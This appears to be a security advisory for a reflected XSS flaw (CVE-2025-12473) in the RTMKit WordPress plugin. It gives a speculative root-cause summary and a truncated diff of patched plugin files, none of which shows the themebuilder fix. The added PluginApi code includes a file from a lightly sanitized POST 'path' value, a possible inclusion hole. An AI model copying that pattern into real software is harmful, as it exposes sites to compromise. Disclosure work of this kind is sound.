Atomic Edge analysis of CVE-2025-12473:
The vulnerability is a reflected cross-site scripting (XSS) flaw in the RTMKit WordPress plugin. The root cause is insufficient input sanitization and output escaping for the ‘themebuilder’ parameter within the plugin’s admin interface. The vulnerable code resides in the ThemebuilderModule class, specifically in the ‘render’ method or a related view file that echoes the unsanitized parameter value. Attackers can exploit this by crafting a malicious URL containing a JavaScript payload in the ‘themebuilder’ parameter and tricking an administrator into clicking it. When the administrator visits the crafted URL while authenticated, the payload executes in the context of the WordPress admin area, allowing for session hijacking, site defacement, or plugin installation. The patch addresses this by implementing proper output escaping, likely using esc_html() or esc_attr() functions, before echoing the parameter value. The impact is a client-side code execution attack targeting administrators, which can lead to full site compromise.
Published : March 18, 2026
CVE-2025-12473: RTMKit <= 1.6.8 – Reflected Cross-Site Scripting via 'themebuilder' Parameter (rometheme-for-elementor)
CVE ID
CVE-2025-12473
Plugin
rometheme-for-elementor
Severity
Medium
(CVSS 6.1)
CWE
79
Vulnerable Version
1.6.8
Patched Version
2.0.0
Disclosed
March 9, 2026
Analysis Overview
Differential between vulnerable and patched code
Code Diff
--- a/rometheme-for-elementor/Inc/Core/Plugin.php
+++ b/rometheme-for-elementor/Inc/Core/Plugin.php
@@ -0,0 +1,280 @@
+<?php
+
+namespace RTMKitCore;
+
+/**
+ * Plugin
+ *
+ * Main plugin class for RomeThemeKit.
+ *
+ * @package RTMKitCore
+ */
+
+use DomElement;
+use Exception;
+
+class Plugin
+{
+ protected $modules;
+
+ protected static $instance;
+
+ /**
+ * Get the singleton instance of the Plugin class.
+ *
+ * @return Plugin
+ */
+ public static function instance(): self
+ {
+ if (!isset(self::$instance)) {
+ self::$instance = new self();
+ }
+ return self::$instance;
+ }
+
+ public function init()
+ {
+ if (! $this->wizard_setup_check()) {
+ (new RTMKitModulesSetupWizardSetupWizardModule())->init();
+ return;
+ }
+ add_action('admin_page_access_denied', [$this, 'redirect']);
+ // Wizard sudah selesai → jalankan plugin normal
+ $this->runner();
+ }
+
+ function redirect()
+ {
+ if (!is_admin()) {
+ return;
+ }
+
+ if (!current_user_can('manage_options')) {
+ return;
+ }
+
+ if (!isset($_GET['page'])) {
+ return;
+ }
+
+ $page = sanitize_key($_GET['page']);
+
+ // Daftar page admin plugin yang VALID
+ $valid_pages = [
+ 'rtmkit',
+ 'rtmkit-setup-wizard',
+ ];
+
+ // 1️⃣ Kalau page tidak valid → redirect ke halaman utama plugin
+ if (!in_array($page, $valid_pages, true)) {
+ wp_safe_redirect(admin_url('admin.php?page=rtmkit'));
+ exit;
+ }
+
+ // 2️⃣ Kalau wizard dibuka tapi sudah selesai → redirect
+ if ($page === 'rtmkit-setup-wizard') {
+ if (get_option('rtmkit_wizard_setup_complete_2.0', false)) {
+ wp_safe_redirect(admin_url('admin.php?page=rtmkit'));
+ exit;
+ }
+ // wizard belum selesai → biarkan
+ return;
+ }
+ }
+
+ public function before_plugin_load()
+ {
+ add_action('upgrader_process_complete', function ($upgrader, $hook_extra) {
+
+ if (
+ empty($hook_extra['action']) ||
+ empty($hook_extra['type']) ||
+ $hook_extra['action'] !== 'update' ||
+ $hook_extra['type'] !== 'plugin'
+ ) {
+ return;
+ }
+
+ if (
+ empty($hook_extra['plugins']) ||
+ !in_array(plugin_basename(RTM_KIT_FILE), $hook_extra['plugins'], true)
+ ) {
+ return;
+ }
+
+ $this->rtm_handle_install_upgrade();
+ }, 10, 2);
+ add_action('admin_init', function () {
+ if (!get_option('rtmkit_redirect_wizard')) {
+ return;
+ }
+ if (
+ wp_doing_ajax() ||
+ wp_doing_cron() ||
+ defined('WP_CLI') ||
+ !current_user_can('manage_options')
+ ) {
+ return;
+ }
+
+ if (isset($_GET['page']) && $_GET['page'] === 'rtmkit-setup-wizard') {
+ return;
+ }
+
+ delete_option('rtmkit_redirect_wizard');
+
+ wp_safe_redirect(admin_url('admin.php?page=rtmkit-setup-wizard'));
+ exit;
+ });
+ }
+
+ public function wizard_setup_check()
+ {
+ $setup_complete = get_option('rtmkit_wizard_setup_complete_2.0', false);
+ return $setup_complete;
+ }
+
+ public function runner()
+ {
+ $this->modules = [
+ 'menu' => RTMKitModulesMenu::class,
+ 'plugin_api' => PluginApi::class,
+ 'modules' => RTMKitModulesManager::class,
+ 'widget_module' => RTMKitModulesWidgetsWidgetModule::class,
+ 'extensions' => RTMKitModulesExtensionsExtensionModule::class,
+ 'themebuilder' => RTMKitModulesThemebuilderThemebuilderModule::class,
+ 'templatekits' => RTMKitModulesTemplatekitsTemplatekitModule::class,
+ 'icons' => RTMKitModulesRTMIconsRTMIconsModule::class,
+ 'submission' => RTMKitModulesSubmissionSubmissionModule::class,
+ 'update' => RTMKitModulesUpdateUpdateModule::class,
+ 'editor_canvas' => RTMKitModulesHelperEditorCanvas::class
+ ];
+ add_action('rtmkit_loaded', [$this, 'load']);
+ add_action('admin_enqueue_scripts', function () {
+ wp_enqueue_style('rtmkit-system-panel', RTM_KIT_URL . 'assets/css/panel_system.css', [], RTM_KIT_VERSION);
+ wp_enqueue_script('rtmkit-system-panel', RTM_KIT_URL . 'assets/js/panel_system.js', ['jquery'], RTM_KIT_VERSION, true);
+ });
+ add_action('wp_enqueue_scripts', function () {
+ wp_enqueue_style('rtmkit-system-panel', RTM_KIT_URL . 'assets/css/panel_system.css', [], RTM_KIT_VERSION);
+ wp_enqueue_script('rtmkit-system-panel', RTM_KIT_URL . 'assets/js/panel_system.js', ['jquery'], RTM_KIT_VERSION, true);
+ });
+ }
+
+ /**
+ * Load plugin.
+ */
+
+ public function load()
+ {
+ try {
+ $this->loadModules();
+ add_action('elementor/editor/after_enqueue_scripts', [$this, 'enqueue_panel_styles']);
+ add_filter('admin_footer_text', function ($text) {
+ $screen = get_current_screen();
+
+ if (!$screen) {
+ return $text;
+ }
+
+ // contoh: hanya pada page plugin
+ if ($screen->id === 'toplevel_page_rtmkit') {
+ return '';
+ }
+
+ return $text;
+ });
+
+ add_filter('update_footer', function ($text) {
+ $screen = get_current_screen();
+
+ if ($screen && $screen->id === 'toplevel_page_rtmkit') {
+ return '';
+ }
+
+ return $text;
+ }, 11);
+
+ new RTMKitModulesHelperBanner();
+ } catch (Exception $e) {
+ // Handle exceptions if necessary
+ error_log($e->getMessage());
+ }
+ }
+
+ /**
+ * Load modules.
+ */
+ protected function loadModules(): void
+ {
+ foreach ($this->modules as $module => $class) {
+ (new $class())->init();
+ }
+ }
+
+ /**
+ * Check if the RomeThemeForm plugin is active.
+ *
+ * @return bool
+ */
+ public function has_rtmform(): bool
+ {
+ include_once(ABSPATH . 'wp-admin/includes/plugin.php');
+ return is_plugin_active('romethemeform/rometheme-form.php');
+ }
+
+ public function enqueue_panel_styles()
+ {
+ if (ElementorPlugin::$instance->editor->is_edit_mode()) {
+ wp_enqueue_style('rtmkit-elementor-panel', RTM_KIT_URL . 'assets/css/panel.css', [], RTM_KIT_VERSION);
+ }
+ }
+
+ public function pro_is_active(): bool
+ {
+ if (class_exists('RTMKitProCorePlugin')) {
+ return RTMKitProModulesLicensesLicenseStorage::instance()->isLicenseActive();
+ }
+
+ return false;
+ }
+
+ public function rtm_handle_install_upgrade()
+ {
+ update_option('rtmkit_version', RTM_KIT_VERSION);
+
+ $wizardComplete = get_option('rtmkit_wizard_setup_complete_2.0', false);
+
+ if (!$wizardComplete) {
+ add_option('rtmkit_redirect_wizard', true);
+ }
+ }
+
+ public function pro_version_compatible_check()
+ {
+ $pro_plugin = 'romethemekit-pro/RomeTheme_pro.php';
+ $pro_path = WP_PLUGIN_DIR . '/' . $pro_plugin;
+
+ if (file_exists($pro_path)) {
+
+ if (!function_exists('get_plugin_data')) {
+ require_once ABSPATH . 'wp-admin/includes/plugin.php';
+ }
+
+ $pro_version = get_plugin_data($pro_path, false, false);
+
+ if (
+ class_exists('RTMKitModulesUpdateUpdateModule') &&
+ method_exists('RTMKitModulesUpdateUpdateModule', 'instance')
+ ) {
+ $plugins = RTMKitModulesUpdateUpdateModule::instance()->get_plugins();
+
+ if (
+ isset($plugins['rtmkitpro']['min_version']) &&
+ version_compare($pro_version['Version'], $plugins['rtmkitpro']['min_version'], '<')
+ ) {
+ deactivate_plugins($pro_plugin);
+ }
+ }
+ }
+ }
+}
--- a/rometheme-for-elementor/Inc/Core/PluginApi.php
+++ b/rometheme-for-elementor/Inc/Core/PluginApi.php
@@ -0,0 +1,86 @@
+<?php
+
+namespace RTMKitCore;
+
+class PluginApi
+{
+ /**
+ * Get the singleton instance of the PluginApi class.
+ *
+ * @return PluginApi
+ */
+ public static function instance(): self
+ {
+ static $instance = null;
+
+ if (null === $instance) {
+ $instance = new self();
+ }
+
+ return $instance;
+ }
+
+ /**
+ * Initialize the plugin API.
+ */
+ public function init()
+ {
+ if (wp_doing_ajax()) {
+ add_action('wp_ajax_get_sidebar_content', [$this, 'get_sidebar_content']);
+ add_action('wp_ajax_get_content', [$this, 'get_content']);
+ add_action('wp_ajax_set_global_site', [$this, 'set_global_site']);
+ }
+ }
+
+ public function get_sidebar_content()
+ {
+ // Load the sidebar view file
+
+ check_ajax_referer('rtmkit_nonce', 'nonce');
+ if (!file_exists(RTM_KIT_DIR . 'views/sidebar.php')) {
+ wp_send_json_error('Sidebar view file not found.');
+ return;
+ }
+ ob_start();
+ require_once RTM_KIT_DIR . 'views/sidebar.php';
+ $content = ob_get_clean();
+ wp_send_json_success($content);
+ }
+
+ public function get_content()
+ {
+ check_ajax_referer('rtmkit_nonce', 'nonce');
+
+ if (!isset($_POST['path'])) {
+ wp_send_json_error('Path not specified.');
+ return;
+ }
+ $path = sanitize_text_field($_POST['path']);
+ $file = RTM_KIT_DIR . 'views/' . $path . '.php';
+ if (!file_exists($file)) {
+ return '';
+ }
+ ob_start();
+ require_once $file;
+ $content = ob_get_clean();
+ wp_send_json_success($content);
+ }
+
+ public function set_global_site()
+ {
+ check_ajax_referer('rtmkit_nonce', 'nonce');
+
+ if (!current_user_can('manage_options')) {
+ wp_send_json_error('Access Denied.');
+ wp_die();
+ }
+
+ $idKit = sanitize_text_field($_POST['idKit']);
+ $update = update_option('elementor_active_kit', $idKit);
+ if ($update) {
+ wp_send_json_success('Global Site Settings updated successfully.');
+ } else {
+ wp_send_json_error('No changes were made.');
+ }
+ }
+}
--- a/rometheme-for-elementor/Inc/Elements/Accordion.php
+++ b/rometheme-for-elementor/Inc/Elements/Accordion.php
@@ -0,0 +1,1149 @@
+<?php
+
+namespace RTMKitElements;
+
+class Accordion extends ElementorWidget_Base
+{
+ private function get_widget_data()
+ {
+ return RTMkitModulesWidgetsWidgetStorage::instance()->get_widget_data_by_key('accordion');
+ }
+
+ public function get_name()
+ {
+ return 'rkit-accordion';
+ }
+
+ public function get_title()
+ {
+ return $this->get_widget_data()['name'];
+ }
+
+ public function get_icon()
+ {
+ $icon = 'rkit-widget-icon ' . $this->get_widget_data()['icon'];
+ return $icon;
+ }
+ public function get_categories()
+ {
+ return ['romethemekit_widgets'];
+ }
+
+ public function get_keywords()
+ {
+ return ['accordion', 'rometheme'];
+ }
+
+ function get_custom_help_url()
+ {
+ return 'https://support.rometheme.net/docs/romethemekit/widgets/how-to-use-ezd_ampersand-customize-accordion-widget/';
+ }
+
+ public function get_style_depends()
+ {
+ return ['rtmkit-element-accordion'];
+ }
+
+ public function get_script_depends()
+ {
+ return ['rtmkit-element-accordion'];
+ }
+
+ public function get_elementor_template()
+ {
+ $template = get_posts([
+ 'post_type' => 'elementor_library',
+ 'posts_per_page' => -1,
+ 'meta_query' => [
+ [
+ 'key' => '_elementor_template_type',
+ 'value' => 'kit',
+ 'compare' => '!=',
+ ],
+ ],
+ ]);
+ $list = [];
+ if ($template) {
+ foreach ($template as $template) {
+ $list[intval($template->ID)] = esc_html__($template->post_title, 'rometheme-for-elementor');
+ }
+ }
+ return $list;
+ }
+
+ protected function register_controls()
+ {
+ $this->start_controls_section('accordion', ['label' => esc_html('Accordion'), 'tab' => ElementorControls_Manager::TAB_CONTENT]);
+
+ $list = new ElementorRepeater();
+
+ $list->add_control('accordion_title', [
+ 'label' => esc_html('Title'),
+ 'type' => ElementorControls_Manager::TEXT,
+ 'placeholder' => esc_html('Input Your Title Here')
+ ]);
+
+ $list->add_control('accordion_sub_title', [
+ 'label' => esc_html('Sub Title'),
+ 'type' => ElementorControls_Manager::TEXT,
+ 'placeholder' => esc_html('Input Your Sub Title Here')
+ ]);
+
+ $list->add_control(
+ 'open_default',
+ [
+ 'label' => esc_html__('Default Open ?', 'rometheme-for-elementor'),
+ 'type' => ElementorControls_Manager::SWITCHER,
+ 'label_on' => esc_html__('Yes', 'rometheme-for-elementor'),
+ 'label_off' => esc_html__('No', 'rometheme-for-elementor'),
+ 'return_value' => 'yes',
+ ]
+ );
+
+ $list->add_control('description_type', [
+ 'label' => esc_html('Description Type'),
+ 'type' => ElementorControls_Manager::SELECT,
+ 'options' => [
+ 'description' => esc_html('Description'),
+ 'template' => esc_html('Saved Template'),
+ ],
+ 'default' => 'description'
+ ]);
+
+ $list->add_control(
+ 'item_description',
+ [
+ 'label' => esc_html__('Description', 'rometheme-for-elementor'),
+ 'type' => ElementorControls_Manager::WYSIWYG,
+ 'placeholder' => esc_html__('Type your description here', 'rometheme-for-elementor'),
+ 'condition' => [
+ 'description_type' => 'description'
+ ]
+ ]
+ );
+
+ $list->add_control('item_template', [
+ 'label' => esc_html('Choose Templates'),
+ 'type' => ElementorControls_Manager::SELECT,
+ 'options' => $this->get_elementor_template(),
+ 'condition' => [
+ 'description_type' => 'template'
+ ]
+ ]);
+
+ $list->add_control(
+ 'accordion_header_icon',
+ [
+ 'label' => esc_html__('Title Icon', 'rometheme-for-elementor'),
+ 'type' => ElementorControls_Manager::ICONS,
+ 'default' => [
+ 'value' => 'rtmicon-thin rtmicon-romethemekit',
+ 'library' => 'rtmicons-thin',
+ ],
+ ]
+ );
+
+ $this->add_control(
+ 'show_loop_count',
+ [
+ 'label' => esc_html__('Show Index Number', 'rometheme-for-elementor'),
+ 'type' => ElementorControls_Manager::SWITCHER,
+ 'label_on' => esc_html__('Yes', 'rometheme-for-elementor'),
+ 'label_off' => esc_html__('No', 'rometheme-for-elementor'),
+ 'return_value' => 'yes',
+ 'default' => '',
+ ]
+ );
+
+ $this->add_control(
+ 'show_zero_padded',
+ [
+ 'label' => esc_html__('Use Index with Zero-Pad', 'rometheme-for-elementor'),
+ 'type' => ElementorControls_Manager::SWITCHER,
+ 'label_on' => esc_html__('Yes', 'rometheme-for-elementor'),
+ 'label_off' => esc_html__('No', 'rometheme-for-elementor'),
+ 'return_value' => 'yes',
+ 'default' => '',
+ 'condition' => [
+ 'show_loop_count' => 'yes'
+ ]
+ ]
+ );
+
+ $this->add_control(
+ 'show_heading_icons',
+ [
+ 'label' => esc_html__('Show Title Icon', 'rometheme-for-elementor'),
+ 'type' => ElementorControls_Manager::SWITCHER,
+ 'label_on' => esc_html__('Yes', 'rometheme-for-elementor'),
+ 'label_off' => esc_html__('No', 'rometheme-for-elementor'),
+ 'return_value' => 'yes',
+ 'default' => '',
+ ]
+ );
+
+ $this->add_control(
+ 'show_subheading',
+ [
+ 'label' => esc_html__('Show Sub Title', 'rometheme-for-elementor'),
+ 'type' => ElementorControls_Manager::SWITCHER,
+ 'label_on' => esc_html__('Yes', 'rometheme-for-elementor'),
+ 'label_off' => esc_html__('No', 'rometheme-for-elementor'),
+ 'return_value' => 'yes',
+ 'default' => '',
+ ]
+ );
+
+ $this->add_control('title_tag', [
+ 'label' => esc_html('Title HTML Tag'),
+ 'type' => ElementorControls_Manager::SELECT,
+ 'options' => [
+ 'h1' => esc_html('H1'),
+ 'h2' => esc_html('H2'),
+ 'h3' => esc_html('H3'),
+ 'h4' => esc_html('H4'),
+ 'h5' => esc_html('H5'),
+ 'h6' => esc_html('H6'),
+ 'span' => esc_html('Span'),
+ 'div' => esc_html('DIV')
+ ],
+ 'default' => 'span'
+ ]);
+
+ $this->add_control(
+ 'hr',
+ [
+ 'type' => ElementorControls_Manager::DIVIDER,
+ ]
+ );
+
+ $this->add_control('list_items', [
+ 'label' => esc_html('Content'),
+ 'type' => ElementorControls_Manager::REPEATER,
+ 'fields' => $list->get_controls(),
+ 'default' => [
+ [
+ 'accordion_title' => esc_html('Accordion #1'),
+ 'accordion_sub_title' => esc_html('Accordion Sub Title #1'),
+ 'open_default' => 'yes',
+ 'item_description' => esc_html('Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nullam non lacus quam. Donec est velit, condimentum vitae tempor eget, pretium et massa. Integer velit dui, lacinia non turpis at, lobortis tincidunt risus. Donec ut cursus urna. Praesent luctus interdum ante. Lorem ipsum dolor sit amet, consectetur adipiscing elit.')
+ ],
+ [
+ 'accordion_title' => esc_html('Accordion #2'),
+ 'accordion_sub_title' => esc_html('Accordion Sub Title #2'),
+ 'item_description' => esc_html('Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nullam non lacus quam. Donec est velit, condimentum vitae tempor eget, pretium et massa. Integer velit dui, lacinia non turpis at, lobortis tincidunt risus. Donec ut cursus urna. Praesent luctus interdum ante. Lorem ipsum dolor sit amet, consectetur adipiscing elit.')
+ ],
+ [
+ 'accordion_title' => esc_html('Accordion #3'),
+ 'accordion_sub_title' => esc_html('Accordion Sub Title #3'),
+ 'item_description' => esc_html('Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nullam non lacus quam. Donec est velit, condimentum vitae tempor eget, pretium et massa. Integer velit dui, lacinia non turpis at, lobortis tincidunt risus. Donec ut cursus urna. Praesent luctus interdum ante. Lorem ipsum dolor sit amet, consectetur adipiscing elit.')
+ ],
+ ],
+ 'title_field' => '{{{ accordion_title }}}'
+ ]);
+
+ $this->end_controls_section();
+
+ $this->start_controls_section('icons_content', [
+ 'label' => esc_html('Toggle Icon'),
+ 'tab' => ElementorControls_Manager::TAB_CONTENT
+ ]);
+
+ $this->add_control(
+ 'icon_position',
+ [
+ 'label' => esc_html__('Icon Position', 'rometheme-for-elementor'),
+ 'type' => ElementorControls_Manager::CHOOSE,
+ 'options' => [
+ 'row-reverse' => [
+ 'title' => esc_html__('Left', 'rometheme-for-elementor'),
+ 'icon' => 'eicon-h-align-left',
+ ],
+ 'row' => [
+ 'title' => esc_html__('Right', 'rometheme-for-elementor'),
+ 'icon' => 'eicon-h-align-right',
+ ],
+ ],
+ 'default' => 'row',
+ 'toggle' => true,
+ 'selectors' => [
+ '{{WRAPPER}} .rkit-accordion-header' => 'flex-direction: {{VALUE}};',
+ ],
+ ]
+ );
+
+ $this->add_control(
+ 'icon_close',
+ [
+ 'label' => esc_html__('Icon', 'rometheme-for-elementor'),
+ 'type' => ElementorControls_Manager::ICONS,
+ 'default' => [
+ 'value' => 'rtmicon rtmicon-chevron-down',
+ 'library' => 'rtmicons',
+ ],
+ ]
+ );
+
+ $this->add_control(
+ 'icon_open',
+ [
+ 'label' => esc_html__('Icon Active', 'rometheme-for-elementor'),
+ 'type' => ElementorControls_Manager::ICONS,
+ 'default' => [
+ 'value' => 'rtmicon rtmicon-chevron-up',
+ 'library' => 'rtmicons',
+ ],
+ ]
+ );
+
+ $this->end_controls_section();
+
+ $this->start_controls_section('accordion_style', [
+ 'label' => esc_html('Accordion'),
+ 'tab' => ElementorControls_Manager::TAB_STYLE
+ ]);
+
+ $this->add_responsive_control(
+ 'accordion_spacing',
+ [
+ 'label' => esc_html__('Spacing', 'rometheme-for-elementor'),
+ 'type' => ElementorControls_Manager::SLIDER,
+ 'size_units' => ['px', 'em', 'rem', 'custom'],
+ 'range' => [
+ 'px' => [
+ 'min' => 0,
+ 'max' => 1000,
+ 'step' => 5,
+ ],
+ ],
+ 'selectors' => [
+ '{{WRAPPER}} .rkit-accordion' => 'gap: {{SIZE}}{{UNIT}};',
+ ],
+ ]
+ );
+
+ $this->end_controls_section();
+
+ $this->start_controls_section('title_style', [
+ 'label' => esc_html('Title'),
+ 'tab' => ElementorControls_Manager::TAB_STYLE
+ ]);
+
+ $this->add_responsive_control(
+ 'title_text_align',
+ [
+ 'label' => esc_html__('Alignment', 'rometheme-for-elementor'),
+ 'type' => ElementorControls_Manager::CHOOSE,
+ 'options' => [
+ 'left' => [
+ 'title' => esc_html__('Left', 'rometheme-for-elementor'),
+ 'icon' => 'eicon-text-align-left',
+ ],
+ 'center' => [
+ 'title' => esc_html__('Center', 'rometheme-for-elementor'),
+ 'icon' => 'eicon-text-align-center',
+ ],
+ 'right' => [
+ 'title' => esc_html__('Right', 'rometheme-for-elementor'),
+ 'icon' => 'eicon-text-align-right',
+ ],
+ ],
+ 'default' => 'left',
+ 'toggle' => true,
+ 'selectors' => [
+ '{{WRAPPER}} .rkit-accordion__title, {{WRAPPER}} .header-subtitle' => 'text-align: {{VALUE}};',
+ ],
+ ]
+ );
+
+ $this->add_group_control(
+ ElementorGroup_Control_Typography::get_type(),
+ [
+ 'name' => 'title_typography',
+ 'selector' => '{{WRAPPER}} .rkit-accordion__title',
+ ]
+ );
+
+ $this->add_responsive_control(
+ 'title_padding',
+ [
+ 'label' => esc_html__('Padding', 'rometheme-for-elementor'),
+ 'type' => ElementorControls_Manager::DIMENSIONS,
+ 'size_units' => ['px', '%', 'em', 'rem', 'custom'],
+ 'selectors' => [
+ '{{WRAPPER}} .rkit-accordion__title' => 'padding: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
+ ],
+ ]
+ );
+
+ $this->start_controls_tabs('title_tabs');
+
+ $this->start_controls_tab('title_tab_close', ['label' => esc_html('Close')]);
+
+ $this->add_control('text_color_close', [
+ 'label' => esc_html('Text Color'),
+ 'type' => ElementorControls_Manager::COLOR,
+ 'selectors' => [
+ '{{WRAPPER}} .rkit-accordion__title' => 'color:{{VALUE}}'
+ ]
+ ]);
+
+ $this->add_control(
+ 'acc_bg_hr_close',
+ [
+ 'type' => ElementorControls_Manager::DIVIDER,
+ ]
+ );
+
+ $this->add_group_control(
+ ElementorGroup_Control_Background::get_type(),
+ [
+ 'name' => 'acc_background_close',
+ 'types' => ['classic', 'gradient'],
+ 'selector' => '{{WRAPPER}} .rkit-accordion-header',
+ ]
+ );
+
+ $this->add_control(
+ 'acc_border_hr_close',
+ [
+ 'type' => ElementorControls_Manager::DIVIDER,
+ ]
+ );
+
+ $this->add_group_control(
+ ElementorGroup_Control_Border::get_type(),
+ [
+ 'name' => 'acc_border_close',
+ 'selector' => '{{WRAPPER}} .rkit-accordion-header',
+ ]
+ );
+
+ $this->add_responsive_control(
+ 'title_radius_close',
+ [
+ 'label' => esc_html__('Border Radius', 'rometheme-for-elementor'),
+ 'type' => ElementorControls_Manager::DIMENSIONS,
+ 'size_units' => ['px', '%', 'em', 'rem', 'custom'],
+ 'selectors' => [
+ '{{WRAPPER}} .rkit-accordion-header' => 'border-radius: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
+ ],
+ ]
+ );
+
+ $this->add_group_control(
+ ElementorGroup_Control_Box_Shadow::get_type(),
+ [
+ 'name' => 'accordion_box_shadow_close',
+ 'selector' => '{{WRAPPER}} .rkit-accordion-header',
+ ]
+ );
+
+ $this->end_controls_tab();
+
+ $this->start_controls_tab('title_tab_open', ['label' => esc_html('Open')]);
+
+ $this->add_control('text_color_open', [
+ 'label' => esc_html('Text Color'),
+ 'type' => ElementorControls_Manager::COLOR,
+ 'selectors' => [
+ '{{WRAPPER}} .rkit-accordion-item.open .rkit-accordion__title' => 'color:{{VALUE}}'
+ ]
+ ]);
+
+ $this->add_control(
+ 'acc_bg_hr_open',
+ [
+ 'type' => ElementorControls_Manager::DIVIDER,
+ ]
+ );
+
+ $this->add_group_control(
+ ElementorGroup_Control_Background::get_type(),
+ [
+ 'name' => 'acc_background_open',
+ 'types' => ['classic', 'gradient'],
+ 'selector' => '{{WRAPPER}} .rkit-accordion-item.open .rkit-accordion-header',
+ ]
+ );
+
+ $this->add_control(
+ 'acc_border_hr_open',
+ [
+ 'type' => ElementorControls_Manager::DIVIDER,
+ ]
+ );
+
+ $this->add_group_control(
+ ElementorGroup_Control_Border::get_type(),
+ [
+ 'name' => 'acc_border_open',
+ 'selector' => '{{WRAPPER}} .rkit-accordion-item.open .rkit-accordion-header',
+ ]
+ );
+
+ $this->add_responsive_control(
+ 'title_radius_open',
+ [
+ 'label' => esc_html__('Border Radius', 'rometheme-for-elementor'),
+ 'type' => ElementorControls_Manager::DIMENSIONS,
+ 'size_units' => ['px', '%', 'em', 'rem', 'custom'],
+ 'selectors' => [
+ '{{WRAPPER}} .rkit-accordion-item.open .rkit-accordion-header' => 'border-radius: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
+ ],
+ ]
+ );
+
+ $this->add_group_control(
+ ElementorGroup_Control_Box_Shadow::get_type(),
+ [
+ 'name' => 'accordion_box_shadow_open',
+ 'selector' => '{{WRAPPER}} .rkit-accordion-item.open .rkit-accordion-header',
+ ]
+ );
+
+ $this->end_controls_tab();
+
+ $this->start_controls_tab('title_tab_hover', ['label' => esc_html('Hover')]);
+
+ $this->add_control('text_color_hover', [
+ 'label' => esc_html('Text Color'),
+ 'type' => ElementorControls_Manager::COLOR,
+ 'selectors' => [
+ '{{WRAPPER}} .rkit-accordion-header:hover .rkit-accordion__title' => 'color:{{VALUE}}'
+ ]
+ ]);
+
+ $this->add_control(
+ 'acc_bg_hr_hover',
+ [
+ 'type' => ElementorControls_Manager::DIVIDER,
+ ]
+ );
+
+ $this->add_group_control(
+ ElementorGroup_Control_Background::get_type(),
+ [
+ 'name' => 'acc_background_hover',
+ 'types' => ['classic', 'gradient'],
+ 'selector' => '{{WRAPPER}} .rkit-accordion-header:hover',
+ ]
+ );
+
+ $this->add_control(
+ 'acc_border_hr_hover',
+ [
+ 'type' => ElementorControls_Manager::DIVIDER,
+ ]
+ );
+
+ $this->add_group_control(
+ ElementorGroup_Control_Border::get_type(),
+ [
+ 'name' => 'acc_border_hover',
+ 'selector' => '{{WRAPPER}} .rkit-accordion-header:hover',
+ ]
+ );
+
+ $this->add_responsive_control(
+ 'title_radius_hover',
+ [
+ 'label' => esc_html__('Border Radius', 'rometheme-for-elementor'),
+ 'type' => ElementorControls_Manager::DIMENSIONS,
+ 'size_units' => ['px', '%', 'em', 'rem', 'custom'],
+ 'selectors' => [
+ '{{WRAPPER}} .rkit-accordion-header:hover' => 'border-radius: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
+ ],
+ ]
+ );
+
+ $this->add_group_control(
+ ElementorGroup_Control_Box_Shadow::get_type(),
+ [
+ 'name' => 'accordion_box_shadow_hover',
+ 'selector' => '{{WRAPPER}} .rkit-accordion-header:hover',
+ ]
+ );
+
+ $this->end_controls_tab();
+
+ $this->end_controls_tabs();
+
+ $this->add_control(
+ 'title_more_options',
+ [
+ 'label' => esc_html__('Sub Title', 'rometheme-for-elementor'),
+ 'type' => ElementorControls_Manager::HEADING,
+ 'separator' => 'before',
+ 'condition' => [
+ 'show_subheading' => 'yes'
+ ]
+ ]
+ );
+
+ $this->add_group_control(
+ ElementorGroup_Control_Typography::get_type(),
+ [
+ 'name' => 'subtitle_typography',
+ 'selector' => '{{WRAPPER}} .rkit-accordion-header-text .header-subtitle',
+ 'condition' => [
+ 'show_subheading' => 'yes'
+ ]
+ ]
+ );
+
+ $this->add_control('content_subheading_color', [
+ 'label' => esc_html('Text Color'),
+ 'type' => ElementorControls_Manager::COLOR,
+ 'selectors' => [
+ '{{WRAPPER}} .rkit-accordion-header-text .header-subtitle' => 'color:{{VALUE}}'
+ ],
+ 'condition' => [
+ 'show_subheading' => 'yes'
+ ]
+ ]);
+
+ $this->add_responsive_control(
+ 'content_subheading_padding',
+ [
+ 'label' => esc_html__('Padding', 'rometheme-for-elementor'),
+ 'type' => ElementorControls_Manager::DIMENSIONS,
+ 'size_units' => ['px', '%', 'em', 'rem', 'custom'],
+ 'selectors' => [
+ '{{WRAPPER}} .rkit-accordion-header-text .header-subtitle' => 'padding: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
+ ],
+ 'condition' => [
+ 'show_subheading' => 'yes'
+ ]
+ ]
+ );
+
+ $this->end_controls_section();
+
+ $this->start_controls_section('icon_style', [
+ 'label' => esc_html('Toggle Icon'),
+ 'tab' => ElementorControls_Manager::TAB_STYLE
+ ]);
+
+ $this->add_responsive_control(
+ 'icon_size',
+ [
+ 'label' => esc_html__('Size', 'rometheme-for-elementor'),
+ 'type' => ElementorControls_Manager::SLIDER,
+ 'size_units' => ['px', '%', 'em', 'rem', 'custom'],
+ 'range' => [
+ 'px' => [
+ 'min' => 0,
+ 'max' => 1000,
+ 'step' => 5,
+ ],
+ '%' => [
+ 'min' => 0,
+ 'max' => 100,
+ ],
+ ],
+ 'selectors' => [
+ '{{WRAPPER}} .rkit-accordion__icon .icon_open , .rkit-accordion__icon .icon_close' => 'font-size: {{SIZE}}{{UNIT}}; width:{{SIZE}}{{UNIT}} ; height:{{SIZE}}{{UNIT}};',
+ ],
+ ]
+ );
+
+ $this->add_responsive_control(
+ 'icon_box_width',
+ [
+ 'label' => esc_html__('Box Width', 'rometheme-for-elementor'),
+ 'type' => ElementorControls_Manager::SLIDER,
+ 'size_units' => ['px', '%', 'em', 'rem', 'custom'],
+ 'range' => [
+ 'px' => [
+ 'min' => 0,
+ 'max' => 1000,
+ 'step' => 5,
+ ],
+ '%' => [
+ 'min' => 0,
+ 'max' => 100,
+ ],
+ ],
+ 'selectors' => [
